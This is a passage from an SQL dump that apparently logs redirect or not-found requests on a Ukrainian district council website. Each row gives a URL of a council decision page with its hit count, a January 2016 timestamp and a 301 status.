09:40:56','0000-00-00 00:00:00',301),(25061,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--15122010-/98-pro-zatverdzhennja-rozporjadzhen-golovi-rajonnoi_4?tmpl=component&print=1&layout=default&page=','','','',4,0,'2016-01-15 09:40:58','0000-00-00 00:00:00',301),(25062,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--16052012-/314-pro-inicijuvannja-peredachi-u-spilnu-vlasnist?tmpl=component&print=1&layout=default&page=','','','',4,0,'2016-01-15 09:41:03','0000-00-00 00:00:00',301),(25063,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--16052012-/46-pro-vnesennja-zmin-do-programi-zaluchennja?tmpl=component&print=1&layout=default&page=','','','',4,0,'2016-01-15 09:41:06','0000-00-00 00:00:00',301),(25064,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--16052012-/55-pro-hid-vikonannja-rajonnoi-programi-rozvitku_2?tmpl=component&print=1&layout=default&page=','','','',4,0,'2016-01-15 09:41:12','0000-00-00 00:00:00',301),(25065,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19122011-/145-pro-hid-vikonannja-rajonnoi-programi-zaluchennja?tmpl=component&print=1&layout=default&page=','','','',4,0,'2016-01-15 09:41:20','0000-00-00 00:00:00',301),(25066,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19122011-/216-pro-zminu-nazvi-navchalnih-zakladiv-rajonu?tmpl=component&print=1&layout=default&page=','','','',4,0,'2016-01-15 09:41:22','0000-00-00 00:00:00',301),(25067,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19122011-/239-pro-zatverdzhennja-rajonnoi-cilovoi-socialnoi?tmpl=component&print=1&layout=default&page=','','','',4,0,'2016-01-15 09:41:25','0000-00-00 00:00:00',301),(25068,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19122011-/241-pro-vnesennja-zmin-do-skladu-rajonnoi-profesijnoi_2?tmpl=component&print=1&layout=default&page=','','','',4,0,'2016-01-15 09:41:26','0000-00-00 00:00:00',301),(25069,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19122011-/242-pro-zatverdzhennja-tehnichnoi-dokumentacii-z_2?tmpl=component&print=1&layout=default&page=','','','',4,0,'2016-01-15 09:41:31','0000-00-00 00:00:00',301),(25070,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19122011-/247-pro-zatverdzhennja-rajonnoi-kompleksnoi-programi?tmpl=component&print=1&layout=default&page=','','','',4,0,'2016-01-15 09:41:35','0000-00-00 00:00:00',301),(25071,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--20062014-/804-pro-vnesennja-zmin-do-rishennja-rajonnoi-radi-vid_6?tmpl=component&print=1&layout=default&page=','','','',3,0,'2016-01-15 09:41:42','0000-00-00 00:00:00',301),(25072,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--20062014-/823-pro-pripinennja-kontraktu-z-kerivnikom-kp?tmpl=component&print=1&layout=default&page=','','','',4,0,'2016-01-15 09:42:29','0000-00-00 00:00:00',301),(25073,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--20062014-/824-pro-stan-nadannja-medichnoi-dopomogi-zhiteljam?tmpl=component&print=1&layout=default&page=','','','',3,0,'2016-01-15 09:42:38','0000-00-00 00:00:00',301),(25074,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--21102011-/140-pro-hid-vikonannja-rajonnoi-cilovoi-programi?tmpl=component&print=1&layout=default&page=','','','',4,0,'2016-01-15 09:43:03','0000-00-00 00:00:00',301),(25075,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--21102011-/155-pro-vnesennja-zmin-do-rajonnogo-bjudzhetu-na-2011_3?tmpl=component&print=1&layout=default&page=','','','',3,0,'2016-01-15 09:43:13','0000-00-00 00:00:00',301),(25076,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--21102011-/182-pro-hid-vikonannja-programi-zabezpechennja?tmpl=component&print=1&layout=default&page=','','','',4,0,'2016-01-15 09:43:20','0000-00-00 00:00:00',301),(25077,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--21102011-/24-pro-zatverdzhennja-programi-reformuvannja-i?tmpl=component&print=1&layout=default&page=','','','',3,0,'2016-01-15 09:43:24','0000-00-00 00:00:00',301),(25078,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--21102011-/70-pro-hid-vikonannja-rajonnoi-programi-vidpochinku?tmpl=component&print=1&layout=default&page=','','','',5,0,'2016-01-15 09:43:40','0000-00-00 00:00:00',301),(25079,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--21102011-/91-pro-zatverdzhennja-polozhennja-pro-pochesnu?tmpl=component&print=1&layout=default&page=','','','',5,0,'2016-01-15 09:43:45','0000-00-00 00:00:00',301),(25080,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--21122012/324-pro-zatverdzhennja-rajonnoi-programi-shhodo?tmpl=component&print=1&layout=default&page=','','','',4,0,'2016-01-15 09:43:52','0000-00-00 00:00:00',301),(25081,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45?id=2010','','','',6,0,'2016-01-15 09:43:53','0000-00-00 00:00:00',301),(25082,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--21122012/402-pro-zatverdzhennja-rajonnogo-bjudzhetu-na-2013-rik?tmpl=component&print=1&layout=default&page=','','','',4,0,'2016-01-15 09:43:58','0000-00-00 00:00:00',301),(25083,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--21122012/416-pro-vstanovlennja-mezh-silskih-naselenih-punktiv_2?tmpl=component&print=1&layout=default&page=','','','',6,0,'2016-01-15 09:44:03','0000-00-00 00:00:00',301),(25084,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--21122012/418-pro-zatverdzhennja-pereliku-pidpriemstv-shho-e?tmpl=component&print=1&layout=default&page=','','','',5,0,'2016-01-15 09:44:09','0000-00-00 00:00:00',301),(25085,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--21122012/440-pro-zatverdzhennja-rozporjadzhen-golovi-rajonnoi_18?tmpl=component&print=1&layout=default&page=','','','',6,0,'2016-01-15 09:44:22','0000-00-00 00:00:00',301),(25086,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--21122012/443-pro-vnesennja-zmin-do-rajonnogo-bjudzhetu-na-2012_6?tmpl=component&print=1&layout=default&page=','','','',4,0,'2016-01-15 09:44:24','0000-00-00 00:00:00',301),(25087,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--21122012/444-pro-pogodzhennja-vvedennja-shtatnoi-odinici_2?tmpl=component&print=1&layout=default&page=','','','',6,0,'2016-01-15 09:44:29','0000-00-00 00:00:00',301),(25088,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--21122012/445-pro-vnesennja-zmin-do-shtatnogo-rozpisu?tmpl=component&print=1&layout=default&page=','','','',7,0,'2016-01-15 09:44:33','0000-00-00 00:00:00',301),(25089,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--21122012/447-pro-viznachennja-statusu-muzeju-istorii?tmpl=component&print=1&layout=default&page=','','','',4,0,'2016-01-15 09:44:35','0000-00-00 00:00:00',301),(25090,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--23042013-/524-pro-zatverdzhennja-rezultativ-aukcionnih-torgiv-z_2?tmpl=component&print=1&layout=default&page=','','','',4,0,'2016-01-15 09:44:40','0000-00-00 00:00:00',301),(25091,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25072012-/120-pro-nadannja-zgodi-na-ctvorennja-malinskogo?tmpl=component&print=1&layout=default&page=','','','',5,0,'2016-01-15 09:44:44','0000-00-00 00:00:00',301),(25092,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25072012-/152-pro-peredachu-neruhomogo-majna?tmpl=component&print=1&layout=default&page=','','','',6,0,'2016-01-15 09:44:50','0000-00-00 00:00:00',301),(25093,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25072012-/299-pro-nadannja-dozvolu-teritorialnomu-centru_2?tmpl=component&print=1&layout=default&page=','','','',7,0,'2016-01-15 09:44:52','0000-00-00 00:00:00',301),(25094,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25072012-/332-pro-hid-vikonannja-rajonnoi-programi_5?tmpl=component&print=1&layout=default&page=','','','',6,0,'2016-01-15 09:44:58','0000-00-00 00:00:00',301),(25095,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25072012-/334-pro-vnesennja-zmin-do-rishennja-rajonnoi-radi-vid_3?tmpl=component&print=1&layout=default&page=','','','',6,0,'2016-01-15 09:45:00','0000-00-00 00:00:00',301),(25096,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25072012-/335-pro-zatverdzhennja-tehnichnoi-dokumentacii-z_4?tmpl=component&print=1&layout=default&page=','','','',6,0,'2016-01-15 09:45:03','0000-00-00 00:00:00',301),(25097,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25072012-/337-pro-vnesennja-zmin-do-rishennja-rajonnoi-radi-231?tmpl=component&print=1&layout=default&page=','','','',6,0,'2016-01-15 09:45:06','0000-00-00 00:00:00',301),(25098,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25072012-/338-pro-prisvoennja-zvannja-pochesnogo-gromadjanina?tmpl=component&print=1&layout=default&page=','','','',6,0,'2016-01-15 09:45:09','0000-00-00 00:00:00',301),(25099,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25072012-/340-pro-zatverdzhennja-polozhennja-pro-porjadok_2?tmpl=component&print=1&layout=default&page=','','','',6,0,'2016-01-15 09:45:11','0000-00-00 00:00:00',301),(25100,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25072012-/343-pro-zatverdzhennja-polozhennja-pro-porjadok_3?tmpl=component&print=1&layout=default&page=','','','',4,0,'2016-01-15 09:45:15','0000-00-00 00:00:00',301),(25101,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25072012-/345-pro-zatverdzhennja-porjadku-pogodzhennja?tmpl=component&print=1&layout=default&page=','','','',4,0,'2016-01-15 09:45:17','0000-00-00 00:00:00',301),(25102,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25072012-/347-pro-pereukladennja-kontraktu-z-biloshickoju-l-v?tmpl=component&print=1&layout=default&page=','','','',6,0,'2016-01-15 09:45:19','0000-00-00 00:00:00',301),(25103,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25072012-/59-pro-vnesennja-zmin-do-rajonnogo-bjudzhetu-na-2012_2?tmpl=component&print=1&layout=default&page=','','','',6,0,'2016-01-15 09:45:39','0000-00-00 00:00:00',301),(25104,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25102013-/636-pro-stan-zlochinnosti-na-teritorii-malinskogo?tmpl=component&print=1&layout=default&page=','','','',2,0,'2016-01-15 09:46:07','0000-00-00 00:00:00',301),(25105,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--28032012-/270-pro-zatverdzhennja-rajonnoi-kompleksnoi-programi_2?tmpl=component&print=1&layout=default&page=','','','',6,0,'2016-01-15 09:46:24','0000-00-00 00:00:00',301),(25106,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--28032012-/271-pro-pogodzhennja-rozmezhuvannja-zemel-derzhavnoi?tmpl=component&print=1&layout=default&page=','','','',6,0,'2016-01-15 09:46:26','0000-00-00 00:00:00',301),(25107,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--28032012-/274-pro-vnesennja-zmin-do-rishennja-rajonnoi-radi-vid_2?tmpl=component&print=1&layout=default&page=','','','',6,0,'2016-01-15 09:46:27','0000-00-00 00:00:00',301),(25108,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--28032012-/278-pro-vnesennja-zmin-ta-dopovnen-do-polozhennja-pro_2?tmpl=component&print=1&layout=default&page=','','','',6,0,'2016-01-15 09:46:29','0000-00-00 00:00:00',301),(25109,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--28032012-/280-pro-zatverdzhennja-rozporjadzhen-golovi-rajonnoi_11?tmpl=component&print=1&layout=default&page=','','','',6,0,'2016-01-15 09:46:33','0000-00-00 00:00:00',301),(25110,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--28032012-/282-pro-stvorennja-chopovickogo-osvitnogo-okrugu?tmpl=component&print=1&layout=default&page=','','','',4,0,'2016-01-15 09:46:35','0000-00-00 00:00:00',301),(25111,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--28032012-/283-pro-zvernennja-deputativ-malinskoi-rajonnoi-radi?tmpl=component&print=1&layout=default&page=','','','',4,0,'2016-01-15 09:46:38','0000-00-00 00:00:00',301),(25112,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--28032012-/285-pro-peredachu-neruhomogo-majna-shho-perebuvae-u?tmpl=component&print=1&layout=default&page=','','','',4,0,'2016-01-15 09:46:40','0000-00-00 00:00:00',301),(25113,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--28032012-/288-pro-zvit-redaktora-gazeti-malinski-novini-pro?tmpl=component&print=1&layout=default&page=','','','',6,0,'2016-01-15 09:46:53','0000-00-00 00:00:00',301),(25114,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--29112013-/661-pro-priznachennja-direktora-komunalnogo?tmpl=component&print=1&layout=default&page=','','','',3,0,'2016-01-15 09:47:24','0000-00-00 00:00:00',301),(25115,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--29112013-/666-pro-zvernennja-shhodo-zabezpechennja-socialnih?tmpl=component&print=1&layout=default&page=','','','',3,0,'2016-01-15 09:47:33','0000-00-00 00:00:00',301),(25116,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--29112013-/667-pro-nadannja-prava-malinskij-rajonnij-radi?tmpl=component&print=1&layout=default&page=','','','',3,0,'2016-01-15 09:47:45','0000-00-00 00:00:00',301),(25117,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--30042014-/795-pro-zvernennja-do-malinskoi-miskoi-radi_2?tmpl=component&print=1&layout=default&page=','','','',3,0,'2016-01-15 09:47:52','0000-00-00 00:00:00',301),(25118,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-20052011/133-pro-zatverdzhennja-zvitu-pro-vikonannja-rajonnogo_2?tmpl=component&print=1&layout=default&page=','','','',4,0,'2016-01-15 09:47:55','0000-00-00 00:00:00',301),(25119,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-20052011/134-pro-vnesennja-zmin-do-reglamentu-roboti-rajonnoi_2?tmpl=component&print=1&layout=default&page=','','','',3,0,'2016-01-15 09:48:00','0000-00-00 00:00:00',301),(25120,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-20052011/135-pro-plan-roboti-rajonnoi-radi-na-ii-pivrichchja_2?tmpl=component&print=1&layout=default&page=','','','',4,0,'2016-01-15 09:48:04','0000-00-00 00:00:00',301),(25121,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-20052011/136-pro-zatverdzhennja-rajonnoi-programi-rozvitku','','','',18,0,'2016-01-15 09:48:07','0000-00-00 00:00:00',301),(25122,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-20052011/136-pro-zatverdzhennja-rajonnoi-programi-rozvitku?tmpl=component&print=1&layout=default&page=','','','',3,0,'2016-01-15 09:48:11','0000-00-00 00:00:00',301),(25123,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-20052011/137-pro-utvorennja-cilovogo-fondu-socialno?tmpl=component&print=1&layout=default&page=','','','',4,0,'2016-01-15 09:48:14','0000-00-00 00:00:00',301),(25124,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-20052011/169-pro-hid-vikonannja-rajonnoi-programi-reformuvannja?tmpl=component&print=1&layout=default&page=','','','',3,0,'2016-01-15 09:48:18','0000-00-00 00:00:00',301),(25125,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-20052011/170-pro-zatverdzhennja-rajonnoi-programi-provedennja-u?tmpl=component&print=1&layout=default&page=','','','',3,0,'2016-01-15 09:48:20','0000-00-00 00:00:00',301),(25126,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-20052011/172-pro-vnesennja-dopovnen-do-rajonnoi-programi-shhodo?tmpl=component&print=1&layout=default&page=','','','',4,0,'2016-01-15 09:48:25','0000-00-00 00:00:00',301),(25127,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-21022013-/213-pro-zatverdzhennja-rozporjadzhen-golovi-rajonnoi_7?tmpl=component&print=1&layout=default&page=','','','',3,0,'2016-01-15 09:48:52','0000-00-00 00:00:00',301),(25128,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-21022013-/412-pro-programu-socialno-ekonomichnogo-rozvitku_3?tmpl=component&print=1&layout=default&page=','','','',3,0,'2016-01-15 09:48:55','0000-00-00 00:00:00',301),(25129,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-21022013-/441-pro-zatverdzhennja-rozmiru-vartosti-produktiv_3?tmpl=component&print=1&layout=default&page=','','','',3,0,'2016-01-15 09:48:58','0000-00-00 00:00:00',301),(25130,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-21022013-/494-pro-vnesennja-zmin-u-dodatok-do-rishennja-rajonnoi?tmpl=component&print=1&layout=default&page=','','','',2,0,'2016-01-15 09:49:40','0000-00-00 00:00:00',301),(25131,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-21022013-/496-pro-zvernennja-do-direktora-departamentu-finansiv?tmpl=component&print=1&layout=default&page=','','','',2,0,'2016-01-15 09:49:42','0000-00-00 00:00:00',301),(25132,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-21022013-/497-pro-zvernennja-do-korostenskoi-direkcii?tmpl=component&print=1&layout=default&page=','','','',2,0,'2016-01-15 09:49:47','0000-00-00 00:00:00',301),(25133,'http://www.malyn-rayrada.org.ua/index.php?catid=58:--30042014-&id=1294:-2012-2015-&Itemid=105&lang=ru&option=com_content&view=article','','http://www.yandex.ua/clck/jsredir?from=www.yandex.ua%3Bsearch%2F%3Bweb%3B%3B&text=&etext=934.Doho5zNH33q8g0tfxZpQm9qbEaLFY7EiBfyAu3Fd36T5eSL-SLxMl4MJa','',4,0,'2016-01-15 10:16:55','0000-00-00 00:00:00',301),(25134,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=54&Itemid=95&lang=uk','','','',1,0,'2016-01-15 10:20:56','0000-00-00 00:00:00',301),(25135,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=771:-2012-2015-&catid=45&Itemid=84&lang=uk','','','',7,0,'2016-01-15 10:51:06','0000-00-00 00:00:00',301),(25136,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-05-12-54-02/59-rishennja-radi/rishennja/-22022012-','','','',3,0,'2016-01-15 11:17:42','0000-00-00 00:00:00',301),(25137,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=592:2012-02-27-15-06-10&catid=40&Itemid=77&lang=en','','','',3,0,'2016-01-15 11:38:37','0000-00-00 00:00:00',301),(25138,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=647:2012-04-09-08-35-02&catid=42:--16052012-&Itemid=80&lang=uk','','','',2,0,'2016-01-15 14:22:34','0000-00-00 00:00:00',301),(25139,'http://www.malyn-rayrada.org.ua/index.php/588-vitaemo-z-dnem-nezalezhnosti-ukraini?layout=default&page=&print=1&tmpl=component','','http://go.mail.ru/search_images','',1,0,'2016-01-15 16:44:07','0000-00-00 00:00:00',301),(25140,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/58-rishennja-radi/rishennja/--19122011-?lang=uk&limitstart=0','','','',2,0,'2016-01-15 19:19:26','0000-00-00 00:00:00',301),(25141,'http://www.malyn-rayrada.org.ua/index.php/1105-vidnovleno-avtobusnij-marshrut?tmpl=component&print=1&layout=default&page=','','','',2,0,'2016-01-15 20:39:43','0000-00-00 00:00:00',301),(25142,'http://www.malyn-rayrada.org.ua/index.php/1107-umovi-spozhivchogo-kredituvannya-oshchadbankom-fizichnikh-osib-na-pridbannya-energozberigayuchogo-obladnannya-ta-materialiv?tmpl=component&print=1&layout=default&page=','','','',2,0,'2016-01-15 20:39:46','0000-00-00 00:00:00',301),(25143,'http://www.malyn-rayrada.org.ua/index.php/1108-pro-sklikannya-40-pozachergovoji-sesiji-rajonnoji-radi-6-sklikannya?tmpl=component&print=1&layout=default&page=','','','',3,0,'2016-01-15 20:39:48','0000-00-00 00:00:00',301),(25144,'http://www.malyn-rayrada.org.ua/index.php/1112-vikonannya-dokhidnoji-chastini-byudzhetiv-rajoniv-ta-mist-oblasti-za-5-misyatsiv-2015-roku?tmpl=component&print=1&layout=default&page=','','','',2,0,'2016-01-15 20:39:50','0000-00-00 00:00:00',301),(25145,'http://www.malyn-rayrada.org.ua/index.php/1113-pomer-kulchitskij-josip-lyudvigovich-pochesnij-gromadyanin-malina?tmpl=component&print=1&layout=default&page=','','','',2,0,'2016-01-15 20:39:55','0000-00-00 00:00:00',301),(25146,'http://www.malyn-rayrada.org.ua/index.php?catid=47&id=927:2013-02-21-09-06-04&Itemid=86&lang=en&option=com_content&view=article','','','',1,0,'2016-01-15 22:16:37','0000-00-00 00:00:00',301),(25147,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=786:-5-18112009-429-l-r&catid=45&Itemid=84&lang=uk','','','',7,0,'2016-01-16 00:29:23','0000-00-00 00:00:00',301),(25148,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=734:-6-2012-&Itemid=14&lang=uk&option=com_content&view=article','','','',1,0,'2016-01-16 06:12:16','0000-00-00 00:00:00',301),(25149,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=454:2011-10-31-11-01-23&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',2,0,'2016-01-16 07:30:29','0000-00-00 00:00:00',301),(25150,'http://malyn-rayrada.org.ua/index.php/--25072012-/147-pro-zvernennja-do-prezidenta-ukraini-shhodo','','','',3,0,'2016-01-16 12:27:50','0000-00-00 00:00:00',301),(25151,'http://www.malyn-rayrada.org.ua/index.php/568-ogoloshennja_5?layout=default&page=&print=1&tmpl=component','','http://go.mail.ru/search_images','',1,0,'2016-01-16 15:03:12','0000-00-00 00:00:00',301),(25152,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja?catid=0&id=76','','','',9,0,'2016-01-16 15:23:22','0000-00-00 00:00:00',301),(25153,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja?limitstart=0&catid=0&id=76','','','',5,0,'2016-01-16 15:23:25','0000-00-00 00:00:00',301),(25154,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja?limitstart=0&catid=0&id=76','','','',21,0,'2016-01-16 15:36:28','0000-00-00 00:00:00',301),(25155,'http://www.malyn-rayrada.org.ua/index.php?id=2010','','','',3,0,'2016-01-16 15:36:32','0000-00-00 00:00:00',301),(25156,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-05-12-54-02?id=59','','','',1,0,'2016-01-16 21:23:18','0000-00-00 00:00:00',301),(25157,'http://www.malyn-rayrada.org.ua/index.php/259-vidznacheno-deputata-malinskoi-rajonnoi-radi?tmpl=component&print=1&layout=default&page=','','','',2,0,'2016-01-16 22:09:32','0000-00-00 00:00:00',301),(25158,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-22102010-?start=5','','','',4,0,'2016-01-16 22:43:48','0000-00-00 00:00:00',301),(25159,'http://malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-05-22-15/kvituche-selo/2014-09-22-17-49-27/img-7480-89','','','',2,0,'2016-01-16 22:58:16','0000-00-00 00:00:00',301),(25160,'http://malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-05-22-15/kvituche-selo/2014-09-22-17-50-18/malinshchina-i-malinchani-76','','','',2,0,'2016-01-16 22:58:18','0000-00-00 00:00:00',301),(25161,'http://malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-05-22-15/kvituche-selo/2014-09-23-06-08-04/img-1076-20-112','','','',2,0,'2016-01-16 22:58:20','0000-00-00 00:00:00',301),(25162,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--14112012-/371-pro-priznachennja-kerivnika-komunalnogo_2?tmpl=component&print=1&layout=default&page=','','','',3,0,'2016-01-16 22:58:34','0000-00-00 00:00:00',301),(25163,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--14112012-/379-pro-zatverdzhennja-spilnih-rozporjadzhen-golovi_9?tmpl=component&print=1&layout=default&page=','','','',3,0,'2016-01-16 22:58:36','0000-00-00 00:00:00',301),(25164,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--15122010-/113-pro-rajonnu-programu-individualnogo-zhitlovogo','','','',3,0,'2016-01-16 22:58:45','0000-00-00 00:00:00',301),(25165,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--15122010-/114-pro-znjattja-z-kontrolju-rishen-rajonnoi-radi?tmpl=component&print=1&layout=default&page=','','','',3,0,'2016-01-16 22:58:47','0000-00-00 00:00:00',301),(25166,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--16052012-/292-pro-zatverdzhennja-regionalnoi-programi-rozvitku?tmpl=component&print=1&layout=default&page=','','','',3,0,'2016-01-16 22:58:48','0000-00-00 00:00:00',301),(25167,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--16052012-/46-pro-vnesennja-zmin-do-programi-zaluchennja','','','',3,0,'2016-01-16 22:58:52','0000-00-00 00:00:00',301),(25168,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25102013-/606-pro-hid-vikonannja-rishen-rajonnoi-radi-vid-12?tmpl=component&print=1&layout=default&page=','','','',3,0,'2016-01-16 22:59:02','0000-00-00 00:00:00',301),(25169,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25102013-/607-pro-nadannja-dozvolu-na-rozroblennja-detalnogo_2','','','',3,0,'2016-01-16 22:59:03','0000-00-00 00:00:00',301),(25170,'http://www.malyn-rayrada.org.ua/icon0.php','','','',1,0,'2016-01-17 02:39:20','0000-00-00 00:00:00',301),(25171,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=766:2012-09-28-08-37-31&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',2,0,'2016-01-17 08:30:05','0000-00-00 00:00:00',301),(25172,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=618:2012-03-29-08-39-48&catid=40:--28032012-&Itemid=77&lang=en','','','',1,0,'2016-01-17 14:26:43','0000-00-00 00:00:00',301),(25173,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-26-11-2014-roku/69-rishennya-vid-26-11-2014-roku/914-pro-zatverdzhennya-rajonnoji-programi-polipshennya-medichnogo-obslugovuvannya-silskogo-naselennya-malinskogo-rajonu-na-2015-2','','','',1,0,'2016-01-18 00:23:16','0000-00-00 00:00:00',301),(25174,'http://www.malyn-rayrada.org.ua/index.php/68-pro-provedennja-rajonnogo-konkursu-sered-silskih-i?layout=default&page=&print=1&tmpl=component','','http://go.mail.ru/search_images','',1,0,'2016-01-18 07:13:36','0000-00-00 00:00:00',301),(25176,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-05-22-15/kvituche-selo/2014-09-22-17-49-27/pochesni-gromadyani-rajonu-7-7','','','',10,0,'2016-01-18 08:17:10','0000-00-00 00:00:00',301),(25177,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=580:-l-r-2012-2016-&catid=40:--28032012-&Itemid=77&lang=ru','','','',2,0,'2016-01-18 09:57:24','0000-00-00 00:00:00',301),(25178,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-05-22-15/kvituche-selo/2014-09-22-17-49-27/pochesni-gromadyani-rajonu-2-12','','','',4,0,'2016-01-18 11:34:09','0000-00-00 00:00:00',301),(25179,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-05-22-15/kvituche-selo/2014-09-22-17-50-18/venglivskie11-123','','','',4,0,'2016-01-18 11:34:12','0000-00-00 00:00:00',301),(25180,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-05-22-15/kvituche-selo/2014-09-23-06-08-04/img-1145-24-116','','','',4,0,'2016-01-18 11:34:14','0000-00-00 